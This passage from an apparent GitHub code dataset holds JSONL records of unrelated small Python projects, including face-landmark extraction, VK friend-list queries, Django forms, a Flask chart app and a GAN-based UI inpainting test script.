theta_xy_final - beta\n\n return x, y, z, theta_xy, gradient_z\n\n\ndef check_collision(xlist, ylist, kdtree):\n for x, y in zip(xlist, ylist):\n cx = x\n cy = y\n\n ids = kdtree.search_in_distance([cx, cy])\n\n if ids:\n return False\n\n return True # no collision\n","repo_name":"zhangtianlong-git/SEA3DCASE2","sub_path":"tool_functions.py","file_name":"tool_functions.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7017415943","text":"n = int(input())\n# 각 변수들 초기화\ncount = 1\nstart = 1\nend = 1\nsumm = 1\n\nwhile end != n :\n if summ == n: # summ이 n일 때 count 증가 후\n count += 1\n summ += end\n elif summ >n: # summ이 n보다 클 때 start 위치를 뒤로 옮겨줌. summ 값 감소\n summ -= start\n start += 1\n else: # summ이 n보다 작을 때 end 위치를 뒤로 옮겨줌. summ값 증가\n end += 1\n summ += end\nprint(count) \n","repo_name":"kjjs2670/Algorithm","sub_path":"2_13/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5699566113","text":"\"\"\"****************************************************\n#\n# Filename: process_video_and_save_data_average.py\n#\n# Author: endinferno - censhaofeng@buaa.edu.cn\n# Description: This file is used for processing video and extracting features which will be processed by taking average value\n# File Encoding: UTF-8\n# Create: 2019-06-04 19:48:47\n# Last Modified: 2019-06-04 20:08:03\n*****************************************************\"\"\"\n\nimport os\nimport sys\nimport cv2\nimport dlib\n\ncurrent_path = os.getcwd() # 获取当前路径\n# shape_predictor_68_face_landmarks.dat是进行人脸标定的模型,它是基于HOG特征的,这里是他所在的路径\npredictor_path = current_path + \"../../model/shape_predictor_68_face_landmarks.dat\"\nface_directory_path = current_path + \"../../faceimg/\" # 存放人脸图片的路径\n\ndetector = dlib.get_frontal_face_detector() # 获取人脸分类器\npredictor = dlib.shape_predictor(predictor_path) # 获取人脸检测器\n\nvideo_path = sys.argv[1]\n\ncap = cv2.VideoCapture(video_path)\n\nfile_data = open('../../data/data.dat','a')\nfile_data.write(video_path + '\\n')\ncnt = 1\nold_pt = []\n\nwhile True:\n ret, frame = cap.read()\n if ret == True: \n file_data.write(str(cnt)+'\\n')\n dets = detector(frame, 1)\n\n print(\"Number of faces detected: {}\".format(len(dets))) # 打印识别到的人脸个数\n \n for index, face in enumerate(dets):\n print('face {}; left {}; top {}; right {}; bottom {}'.format(index, face.left(), face.top(), face.right(), face.bottom()))\n\n shape = predictor(frame, face) # 寻找人脸的68个标定点 \n for index, pt in enumerate(shape.parts()):\n print('Part {}: {}'.format(index, pt))\n if len(old_pt) == 68:\n pt_pos = ((pt.x + old_pt[index][0]) / 2.0, (pt.y + old_pt[index][1]) / 2.0)\n old_pt[index] = (pt.x, pt.y)\n file_data.write(str(index) + ':')\n file_data.write(str(pt_pos))\n else:\n pt_pos = (pt.x, pt.y)\n old_pt.append(pt_pos)\n k = cv2.waitKey(30) & 0xFF\n if k == 27:\n break\n else:\n break\n file_data.write('\\n')\n cnt += 1\nfile_data.close()\n# k = cv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"endinferno/faceexpression","sub_path":"code/process_video_and_save_data_average.py","file_name":"process_video_and_save_data_average.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38940092475","text":"import requests\n\n\ndef request_get(method: str, **params):\n \"\"\"Returns dict from response\"\"\"\n useragent = None\n proxy = None\n\n data = {\n 'access_token': os.getenv(\"TOKEN\"),\n 'v': 5.131\n }\n data.update(params)\n\n url = f'https://api.vk.com/method/{method}'\n\n resp_json = requests.get(url, params=data, headers=useragent, proxies=proxy).json()\n\n if 'error' in resp_json:\n return resp_json['error']\n else:\n return resp_json['response']\n\n\ndef get_id_from_url(url: str) -> int:\n return request_get('users.get', user_ids=url.split('/')[-1])[0]['id'] # получение id из ссылки\n\n\ndef get_url_from_id(user_id: int) -> str:\n return f'https://vk.com/id{user_id}'\n\n\ndef get_shadows_friends_ids(target_id: int) -> list:\n \"\"\"Returns list of shadow friends\"\"\"\n\n response = request_get('friends.get', user_id=target_id) # получение списка друзей\n\n if 'error_code' in response:\n return []\n\n results = []\n\n for i in response['items']:\n friends_friend = request_get(\"friends.get\", user_id=i)\n if 'error_code' in friends_friend:\n continue\n friends_friend = friends_friend['items']\n if target_id not in friends_friend:\n results.append(i)\n\n return results\n","repo_name":"TheK4n/GetFriendsWhoHidYouVk","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"21391118902","text":"\"\"\"\n :platform: Unix, OS X\n :synopsis: Django forms for Inventory CRUD\n\n .. moduleauthor:: Matthew de Verteuil \n\"\"\"\nfrom django import forms\n\nfrom .models import (Account,\n InventoryItem,\n Purchaser,\n Transaction)\n\n\nclass AccountForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating :class:`.models.Account`\n \"\"\"\n class Meta:\n model = Account\n\n\nclass InventoryItemForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating\n :class:`simp.inventory.models.InventoryItem`\n \"\"\"\n class Meta:\n model = InventoryItem\n\n\nclass PurchaserForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating :class:`.models.Purchaser`\n \"\"\"\n class Meta:\n model = Purchaser\n\n\nclass TransactionForm(forms.ModelForm):\n \"\"\"\n Helper for creating and updating :class:`.models.Transaction`\n \"\"\"\n class Meta:\n model = Transaction\n item = forms.ModelChoiceField(required=True,\n queryset=InventoryItem.objects.exclude(\n archived=True))\n account = forms.ModelChoiceField(required=True,\n queryset=Account.objects.exclude(\n archived=True))\n purchaser = forms.ModelChoiceField(required=True,\n queryset=Purchaser.objects.exclude(\n archived=True))\n","repo_name":"mverteuil/SIMP","sub_path":"simp/inventory/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"10185154563","text":"import os\nnames = []\nfor root, dirnames, filenames in os.walk('/home/harm/Downloads/imagenet/ILSVRC2013_DET_val'):\n for f in filenames:\n names.append(os.path.join(root, f))\nimport json\na = json.dumps(names)\nf = open ('imagenet_val_index.json', 'w')\nf.write(a)\nf.close()\n","repo_name":"hberntsen/resisting-adversarials","sub_path":"00_ImageNet/imagenet_to_json.py","file_name":"imagenet_to_json.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1148944305","text":"from django import forms\nfrom .models import Comment, Photo, Tag\nfrom places.models import CountryIndex, Activity, Animal, Park\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, Div, HTML\nfrom tags_input.fields import TagsInputField\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ('user', 'comment')\n\n\nclass PhotoSearchForm(forms.Form):\n country = forms.ModelChoiceField(queryset=CountryIndex.objects.all())\n park = forms.ModelChoiceField(queryset=Park.objects.all())\n animal = forms.ModelChoiceField(queryset=Animal.objects.all().order_by('name'))\n activity = forms.ModelChoiceField(queryset=Activity.objects.all())\n\n\nclass PhotoTagsForm(forms.ModelForm):\n\n country_index = forms.ModelChoiceField(queryset=CountryIndex.objects.all(), required=False, label=\"Where was this picture taken?\")\n park = forms.ModelChoiceField(queryset=Park.objects.all(), required=False, label=\"Park / game reserve?\")\n activity = forms.ModelChoiceField(queryset=Activity.objects.filter(activity_type=\"SAFARI\"), required=False, label=\"What were you doing?\")\n animals = forms.ModelMultipleChoiceField(\n label=\"Any animals in the photo?\",\n required=False,\n widget=forms.SelectMultiple(attrs={'class': \"select2\"}),\n queryset=Animal.objects.all().order_by('name'),\n )\n\n tags = TagsInputField(queryset=Tag.objects.all(), label=\"Additional tags (example: sunset, jeep)\", required=False)\n\n\n class Meta:\n model = Photo\n fields = ('country_index', 'park', 'activity', 'animals', 'tags')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if self.data.get('country_index',''):\n self.fields['park'].queryset = Park.objects.filter(country_indexes__id=self.data['country_index'])\n else:\n if self.instance.country_index:\n self.fields['park'].queryset = Park.objects.filter(country_indexes__id=self.instance.country_index.id)\n else:\n self.fields['park'].queryset = Park.objects.none()\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(\n Div(\n Div(\n 'country_index',\n css_class=\"col-12 col-md-6\"\n ),\n Div(\n 'park',\n css_class=\"col-12 col-md-6\"\n ),\n\n css_class=\"row\"\n ),\n Div(\n Div(\n 'activity',\n css_class=\"col-12 col-md-6\"\n ),\n\n css_class=\"row\"\n ),\n Div(\n Div(\n 'animals',\n css_class=\"col-12\"\n ),\n\n css_class=\"row\"\n ),\n Div(\n Div(\n 'tags',\n css_class=\"col-12\"\n ),\n\n css_class=\"row\"\n ),\n css_class=\"container\"\n ),\n ButtonHolder(\n Submit('submit', 'Submit', css_class='button white'),\n HTML('Cancel')\n )\n )\n\n","repo_name":"montenegrop/djangotravelportal","sub_path":"photos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3852687519","text":"import plotly.figure_factory as ff \nimport plotly.graph_objects as go \nimport statistics \nimport random \nimport pandas as pd\n\ndf = pd.read_csv(\"data.csv\")\ndata = df[\"Math_score\"].tolist()\n\nmean = statistics.mean(data)\nstdev = statistics.stdev(data)\n\nprint(\"The mean is \" , mean)\nprint(\"The standard deviation is \" , stdev)\n\ndef random_mean(): \n sample_data = [] \n for i in range(0,100): \n random_index = random.randint(0,len(data)-1) \n value = data[random_index] \n sample_data.append(value) \n sample_mean = statistics.mean(sample_data) \n #sample_stdDEv = statistics.stdev(sample_data)\n return sample_mean \n\nmean_list=[] \nfor i in range(0,1000): \n all_mean_data = random_mean() \n mean_list.append(all_mean_data) \n final_mean = statistics.mean(mean_list) \n final_stdDev = statistics.stdev(mean_list) \n print(\"sampling mean:- \",final_mean,\"sampling stdDev: \",final_stdDev) \n \nfig = ff.create_distplot([mean_list], [\"Math scores\"], show_hist = False)\nfig.add_trace(go.Scatter(x=[mean, mean], y=[0,0.20], mode = \"lines\", name = \"Mean\"))\nfig.show()\n","repo_name":"DGS252008/Python","sub_path":"Python/Class-111/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20705529279","text":"import os\nimport random\nimport argparse\n\n\ndef w2f(ofn, lst):\n with open(ofn, 'w') as of:\n for x in lst:\n of.write('{} {}\\n'.format(*x))\n\n\ndef gen_train_val_list(folder, ofolder, val_ratio, ext='jpg'):\n train_lst = []\n val_lst = []\n for _, dirs, _ in os.walk(folder):\n for d in dirs:\n lb = int(d)\n fns = os.listdir(os.path.join(folder, d))\n random.shuffle(fns)\n n = int(len(fns) * val_ratio)\n n = max(len(fns) - n, 1)\n train_lst.extend([(os.path.join(d, fn), lb) for fn in fns[:n]])\n val_lst.extend([(os.path.join(d, fn), lb) for fn in fns[n:]])\n w2f(os.path.join(ofolder, 'train.txt'), train_lst)\n w2f(os.path.join(ofolder, 'val.txt'), val_lst)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--folder',\n type=str,\n help=\"image folder\",\n required=True)\n parser.add_argument('--ofolder',\n type=str,\n default='./',\n help=\"output folder to save train/val list\")\n parser.add_argument('--val-ratio', type=float, default=0.05)\n parser.add_argument(\"--seed\", type=int, default=42, help=\"random seed\")\n args = parser.parse_args()\n\n random.seed(args.seed)\n\n gen_train_val_list(args.folder, args.ofolder, args.val_ratio)\n","repo_name":"yl-1993/hfsoftmax","sub_path":"tools/split_train_val.py","file_name":"split_train_val.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"81"} +{"seq_id":"71072735931","text":"from flask import Flask, render_template, request\n\nAPP = Flask(__name__)\n\n\n@APP.route(\"/\")\n@APP.route(\"/scatter\", methods=[\"GET\", \"POST\"])\ndef scatter():\n x_axis = request.values.get(\"x_axis\", \"health\")\n y_axis = request.values.get(\"y_axis\", \"energy\")\n target = request.values.get(\"target\", \"rarity\")\n return render_template(\n \"scatter.html\",\n x_axis=x_axis,\n y_axis=y_axis,\n target=target,\n axis_options=[\"health\", \"energy\", \"sanity\"],\n target_options=[\"type\", \"rarity\", \"level\"],\n )\n\n\n@APP.route(\"/bar\", methods=[\"GET\", \"POST\"])\ndef bar():\n x_axis = request.values.get(\"x_axis\", \"rarity\")\n target = request.values.get(\"target\", \"type\")\n return render_template(\n \"bar.html\",\n x_axis=x_axis,\n target=target,\n x_options=[\"type\", \"rarity\", \"level\"],\n target_options=[\"type\", \"rarity\", \"level\"],\n )\n\n\n@APP.route(\"/pie\", methods=[\"GET\", \"POST\"])\ndef pie():\n target = request.values.get(\"target\", \"rarity\")\n return render_template(\n \"pie.html\",\n target=target,\n target_options=[\"type\", \"rarity\", \"level\"],\n )\n\n\nif __name__ == '__main__':\n APP.run()\n","repo_name":"BrokenShell/VisFromAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74757708091","text":"import logging\nimport unittest\nimport numpy as np\nfrom cython_example_proj import array_sum, tessellate, factorial\n\n\"\"\"\nSome basic tests\n\"\"\"\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass TestSTL(unittest.TestCase):\n\n def test_array_sum(self):\n\n A = np.random.randn(500, 500)\n result = array_sum(A)\n self.assertAlmostEqual(A.sum(), result)\n\n def test_tessellate(self):\n\n A = np.random.randn(100, 100)\n result = tessellate(A)\n m, n = result.shape\n assert m == 20000\n assert n == 12\n\n def test_factorial(self):\n assert factorial(10) == 3628800\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"thearn/simple-cython-example","sub_path":"cython_example_proj/test/test_cython_examples.py","file_name":"test_cython_examples.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"78"} +{"seq_id":"1221611752","text":"\nclass Car(object):\n \"\"\" Random class car\"\"\"\n def __init__(self, speed=0, fuel_tank_capacity=40):\n \"\"\" Initialize default speed, distance and time \"\"\"\n self.speed = speed\n self.odometer = 0\n self.time = 0\n self.fuel_tank_capacity = fuel_tank_capacity\n self.fuel = 20\n\n def say_state(self):\n \"\"\" Print current speed in km/k\"\"\"\n print(f\"I'm going {self.speed} km/h\")\n\n def accelerate(self):\n \"\"\" Add more speed! \"\"\"\n self.speed += 5\n\n def brake(self):\n \"\"\" Subtract spedd \"\"\"\n if self.speed < 5:\n self.speed = 0\n else: self.speed -= 5\n\n def step(self):\n while self.fuel > 0:\n self.odometer += self.speed\n self.time += 1\n self.fuel -= 0.25\n\n if self.fuel == 0:\n print(\"You dont have fuel\")\n\n def average_speed(self):\n \"\"\" Calculate avarge speed\"\"\"\n return self.odometer / self.time\n\n def refueling(self):\n \"\"\" refueling to max value \"\"\"\n if self.fuel < self.fuel_tank_capacity:\n self.fuel += (self.fuel_tank_capacity - self.fuel)\n\n else:\n print(\"You dont need to refueling\")\n\n\nif __name__ == '__main__':\n\n my_car = Car()\n\n while True:\n action = input(\"Press: \"\n \"[A}ccelerate, \"\"[B]rake, show [O]dometer, \"\"or show average [S]peed\").upper()\n\n if action not in \"ABOS\" or len(action) != 1:\n print('Invalid input')\n if action == 'A':\n my_car.accelerate()\n elif action == 'B':\n my_car.brake()\n elif action == 'O':\n print(f\"Car has driven {my_car.odometer}\")\n\n elif action == 'S':\n print(f\"Average speed is {my_car.speed()} km/h\")\n\n my_car.step()\n my_car.say_state()\n","repo_name":"BSteposz/Unittest2","sub_path":"Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1043431531","text":"import unittest\nfrom rest_framework.serializers import ValidationError\nfrom snippets.serializers import MyUserSerializer\n\n\nclass MyUserSerializerTestCase(unittest.TestCase):\n\n def test_valid_user_data(self):\n # Datos de ejemplo para un usuario válido\n user_data = {\n \"name\": \"John Doe\",\n \"email\": \"john.doe@example.com\",\n \"age\": 25\n }\n\n serializer = MyUserSerializer(data=user_data)\n self.assertTrue(serializer.is_valid())\n\n def test_invalid_user_data(self):\n # Datos de ejemplo para un usuario inválido (edad menor a 18)\n user_data = {\n \"name\": \"Jane Smith\",\n \"email\": \"jane.smith@example.com\",\n \"age\": 15\n }\n\n serializer = MyUserSerializer(data=user_data)\n self.assertFalse(serializer.is_valid())\n\n with self.assertRaises(ValidationError):\n serializer.is_valid(raise_exception=True)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"FYG-Solutions/curso-api-rest-python-2023-05","sub_path":"Clase 12/tutorial/snippets/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21177387439","text":"lijst = eval(input('Geef een lijst met minimaal 10 strubgs: '))\n\nnieuwelijst = []\nfor woord in lijst:\n if len(woord) >= 4:\n nieuwelijst.append(woord)\n\n print(nieuwelijst)\n\n\n#\"boter\", \"kaas\", \"bier\", \"pizza\", \"thee\", \"drop\", \"koek\", \"cola\", \"boterham\", \"stamppot\"","repo_name":"PieterVerschoor/programming1","sub_path":"python5/python6/pe6_2.py","file_name":"pe6_2.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11223373439","text":"\nfrom django.urls import path, include\n\nurlpatterns = [\n path('news/', include('news.urls')),\n path('admins/', include('admins.urls')),\n path('', include('accounts.urls')),\n path('doctor/', include('doctor.urls')),\n path('doc/', include('doc.urls')),\n]\n","repo_name":"samir571/CityHospital","sub_path":"hospital/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27956400018","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\nimport tqdm\nimport os\nimport matplotlib.pyplot as plt\nimport sys\nimport random\nimport pickle\nfrom PIL import Image\nsys.path.append('..')\nfrom network256 import Network\nfrom load import load_test, load\nfrom collections import Counter\n\n\n# Hyperparameters\nIMAGE_SIZE = 256\nLOCAL_SIZE = 64\nBATCH_SIZE = 16\n\n# Get test data\ntest_data = load_test()\nprint(len(test_data))\ntest_data = [x for x in test_data if len(x[1]) == 4]\nprint(len(test_data))\ntest_data = [x for x in test_data if (int(x[1][2]) - int(x[1][0]) > 0 and int(x[1][3]) - int(x[1][1]) > 0)]\nprint(len(test_data))\n\n\n# Load train and test data.\n\n# train_data, test_data = load(\"../../Data/UIdata/npy-Crop/\")\n\n# print(len(train_data))\n# train_data = [x for x in train_data if len(x[1]) == 4]\n# print(len(train_data))\n\n# train_data = [x for x in train_data if (int(x[1][2]) - int(x[1][0]) > 0 and int(x[1][3]) - int(x[1][1]) > 0)]\n# print(len(train_data))\n\n# print(len(test_data))\n# test_data = [x for x in test_data if len(x[1]) == 4]\n# if len(test_data) < BATCH_SIZE:\n# test_data = train_data\n# print(len(test_data))\n\n# test_data = [x for x in test_data if (int(x[1][2]) - int(x[1][0]) > 0 and int(x[1][3]) - int(x[1][1]) > 0)]\n# print(len(test_data))\n\ndef test():\n \n # Setup Tensor\n x = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 3])\n x_modified = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 3])\n mask = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 1])\n local_x = tf.placeholder(tf.float32, [BATCH_SIZE, LOCAL_SIZE, LOCAL_SIZE, 3])\n global_completion = tf.placeholder(tf.float32, [BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, 3])\n local_completion = tf.placeholder(tf.float32, [BATCH_SIZE, LOCAL_SIZE, LOCAL_SIZE, 3])\n is_training = tf.placeholder(tf.bool, [])\n\n # Create model\n model = Network(x, x_modified, mask, local_x, global_completion, local_completion, is_training, batch_size=BATCH_SIZE)\n sess = tf.Session()\n init_op = tf.global_variables_initializer()\n sess.run(init_op)\n\n # Load the model\n saver = tf.train.Saver()\n saver.restore(sess, '../backup/history2/latest')\n\n # np.random.shuffle(test_data)\n \n step_num = int(len(test_data) / BATCH_SIZE) # Total amount of batches\n \n test_results = [] # Store results list\n\n cnt = 0 # Test results counter\n for step_index in tqdm.tqdm(range(step_num)):\n # Get test batch. (Init as 16)\n test_batch = test_data[step_index * BATCH_SIZE:(step_index + 1) * BATCH_SIZE]\n \n # Get original image and normalised\n x_batch = np.array([i[0] for i in test_batch])\n x_batch = np.array([a / 127.5 - 1 for a in x_batch])\n \n # Get modified image and normalised\n # x_batch_modified = modify_images(test_batch)\n x_batch_modified = np.array([i[0] for i in test_batch])\n x_batch_modified = np.array([a / 127.5 - 1 for a in x_batch_modified])\n \n # Get modified area bounds and masks\n bounds = np.array([i[1] for i in test_batch])\n _, mask_batch = get_points(bounds)\n \n # Get other components bound\n other_bounds = np.array([i[2] for i in test_batch])\n \n # Run the model\n completion = sess.run(model.imitation, feed_dict={x: x_batch, x_modified: x_batch_modified, mask: mask_batch, is_training: False})\n \n # Test results in batch\n for batch_index in range(BATCH_SIZE):\n # print(batch_index)\n cnt += 1\n box = bounds[batch_index]\n x1 = (box[0], box[1])\n x2 = (box[2], box[3])\n \n # Original image\n raw = x_batch[batch_index]\n raw = np.array((raw + 1) * 127.5, dtype=np.uint8)\n cv2.rectangle(raw, x1, x2, (255,0,0), 2)\n cv2.imwrite('./real/{}.jpg'.format(\"{0:06d}\".format(cnt)), raw)\n \n # Modified image\n # masked = raw * (1 - mask_batch[batch_index]) + np.ones_like(raw) * mask_batch[batch_index] * 255\n modified = x_batch_modified[batch_index]\n modified = np.array((modified + 1) * 127.5, dtype=np.uint8)\n cv2.rectangle(modified, x1, x2, (255,0,0), 2)\n cv2.imwrite('./input/{}.jpg'.format(\"{0:06d}\".format(cnt)), modified)\n \n # Model output image\n img = completion[batch_index]\n img = np.array((img + 1) * 127.5, dtype=np.uint8)\n cv2.rectangle(img, x1, x2, (255,0,0), 2)\n cv2.imwrite('./output/{}.jpg'.format(\"{0:06d}\".format(cnt)), img)\n \n # Get original mask\n original_mask = mask_batch[batch_index]\n original_mask = original_mask == 1\n original_mask = np.reshape(original_mask, (256,256))\n mask_num = np.sum(original_mask)\n \n # Get delta mask (abs(input - output))\n in_int = np.array(modified, dtype=int)\n out_int = np.array(img, dtype=int)\n \n delta = in_int - out_int\n delta = abs(delta)\n delta = np.array(delta, dtype=np.uint8)\n #delta = delta[:,:,0] + delta[:,:,1] + delta[:,:,2]\n #delta = delta/3\n \n test_results.append((delta, bounds[batch_index], other_bounds[batch_index]))\n cv2.rectangle(delta, x1, x2, (255,0,0), 2)\n \n vis = np.concatenate((raw, modified), axis=1)\n vis = np.concatenate((vis, img), axis=1)\n vis = np.concatenate((vis, delta), axis=1)\n \n dst = './aggregate/{}.jpg'.format(\"{0:06d}\".format(cnt))\n \n if np.max(delta) > 50:\n cv2.imwrite('./aggregate/{}.jpg'.format(\"{0:06d}\".format(cnt)), vis)\n # output_image([['Input', modified], ['Output', img], ['Ground Truth', raw], ['Mask', delta]], dst, bounds[batch_index])\n\n np.save(\"test_results.npy\", test_results)\n\n\ndef get_points(bounds):\n points = []\n mask = []\n for b in bounds:\n \n b = [int(x) for x in b]\n mid_y = (b[0] + b[2])/2\n mid_x = (b[1] + b[3])/2\n \n x1 = int(mid_x - LOCAL_SIZE/2)\n if x1 < 0:\n x1 = 0\n elif x1 > IMAGE_SIZE - LOCAL_SIZE:\n x1 = IMAGE_SIZE - LOCAL_SIZE\n \n y1 = int(mid_y - LOCAL_SIZE/2)\n if y1 < 0:\n y1 = 0\n elif y1 > IMAGE_SIZE - LOCAL_SIZE:\n y1 = IMAGE_SIZE - LOCAL_SIZE\n \n x2, y2 = np.array([x1, y1]) + LOCAL_SIZE\n points.append([x1, y1, x2, y2])\n \n p1 = b[0]\n q1 = b[1]\n p2 = b[2]\n q2 = b[3]\n \n m = np.zeros((IMAGE_SIZE, IMAGE_SIZE, 1), dtype=np.uint8)\n m[q1:q2 + 1, p1:p2 + 1] = 1\n mask.append(m)\n \n \n return np.array(points), np.array(mask)\n \n\ndef output_image(images, dst, box):\n fig = plt.figure(figsize=(15,4))\n for i, image in enumerate(images):\n text, img = image\n fig.add_subplot(1, len(images), i + 1)\n plt.imshow(img)\n plt.tick_params(labelbottom=False)\n plt.tick_params(labelleft=False)\n plt.gca().get_xaxis().set_ticks_position('none')\n plt.gca().get_yaxis().set_ticks_position('none')\n plt.gca().add_patch(plt.Rectangle((box[0],box[1]),box[2] - box[0],box[3] - box[1],linewidth=1,edgecolor='g',facecolor='none'))\n plt.xlabel(text)\n plt.savefig(dst)\n plt.close()\n \ndef change_color(img, box):\n button = img[box[1]:box[3]+1,box[0]:box[2]+1]\n shift = random.randint(50, 150)\n if random.randint(0, 1) == 1:\n shift *= -1\n channel = random.randint(0, 2)\n button[:,:,channel] = button[:,:,channel] + shift\n #button = button + 100\n img[box[1]:box[3]+1,box[0]:box[2]+1] = button\n return img\n\ndef change_size(img, box):\n button = img[box[1]:box[3]+1,box[0]:box[2]+1]\n height, width, channel = button.shape\n button = Image.fromarray(button.astype('uint8')).convert('RGB')\n #button.show()\n k = random.uniform(0.5, 3)\n new_width = int(width*k)\n new_height = int(height*k)\n button = button.resize((new_width, new_height), Image.ANTIALIAS)\n \n left = (new_width - width)/2\n top = (new_height - height)/2\n right = (width + new_width)/2\n bottom = (height + new_height)/2\n #button.show()\n button = button.crop((left, top, right, bottom))\n button = button.resize((width, height), Image.ANTIALIAS)\n #button.show()\n img[box[1]:box[3]+1,box[0]:box[2]+1] = np.array(button)\n return img\n\ndef modify_images(train_batch):\n x_batch = []\n for i in train_batch:\n \n img = i[0].copy()\n box = i[1].copy()\n box = [int(x) for x in box]\n \n a = box[2] - box[0]\n b = box[3] - box[1]\n \n if (a < 0 or b < 0):\n chance = random.randint(0,0)\n print(\"Wrong button bound!!!\")\n else:\n chance = random.randint(0,0)\n if (chance == 0):\n x_batch.append(change_color(img, box))\n else:\n x_batch.append(change_size(img, box))\n return x_batch\n\nif __name__ == '__main__':\n test()\n \n","repo_name":"ZhihengZhou/Project-Criticism","sub_path":"Src/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12975346164","text":"from galaxy_test.driver import integration_util\nfrom galaxy_test.selenium import (\n framework\n)\n\nselenium_test = framework.selenium_test\n\n\nclass SeleniumIntegrationTestCase(integration_util.IntegrationTestCase, framework.TestWithSeleniumMixin, framework.UsesLibraryAssertions):\n\n def setUp(self):\n super().setUp()\n self.setup_selenium()\n\n def tearDown(self):\n self.tear_down_selenium()\n super().tearDown()\n\n\n__all__ = (\n 'selenium_test',\n 'SeleniumIntegrationTestCase',\n)\n","repo_name":"genomicanalysis/galaxy","sub_path":"test/integration_selenium/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"37702479903","text":"import random\nimport math\nN = 100000 \n# Số điểm sinh ra\nN_T = 0\n# Đếm số điểm trong đường tròn\n\nfor i in range(N): # Sinh các số nằm trong [-1, 1]\n\tx = random.random()*2 - 1 # random.random() sinh ra các số nằm trong đoạn [0, 1]\n\ty = random.random()*2 - 1\n\n\tx2 = x**2\n\ty2 = y**2\n\n\tif(math.sqrt(x2 + y2) <= 1.0):\n\t\tN_T += 1\n\npi = (N_T/N)*4\nprint(pi) \nprint(math.exp(2))","repo_name":"rextran/AI","sub_path":"Week2/Exercise/estimate_Pi.py","file_name":"estimate_Pi.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31571743876","text":"import csv\nimport json\nimport string\nimport os\n\nVOCABULARY = set()\nIS_LABEL_INT = False\n\nWORD_INDEX = {}\nPROCESS_INDEXES = [\n 2, # TITLE\n 3, # ABSTRACT\n]\nPROCESS_FIELDS = {'title', 'abstract'}\n\nCLASSES = [\n 'treatment', # 0\n 'diagnosis', # 1\n 'prevention', # 2\n 'mechanism', # 3\n 'transmission', # 4\n 'epidemic forecasting', # 5\n 'case report' # 6\n]\n\nTOTAL_CLASS_NUM = 7\n\nwith open('stopwords.txt') as fp: # Load Stopwords\n STOPWORDS = set(fp.read().splitlines())\n\n\nclass Document:\n def __init__(self, input :list):\n self.pmid: int = input[0]\n self.journal: str = input[1]\n self.title: list = input[2]\n self.abstract: list = input[3]\n self.keywords: list = input[4]\n self.pub_type: list = input[5]\n self.authors: list = input[6]\n self.doi: str = input[7]\n self.label: list = input[8]\n\n def get_bag_of_words(self):\n ret = {}\n words = self.title + self.abstract\n\n for word in words:\n if word in 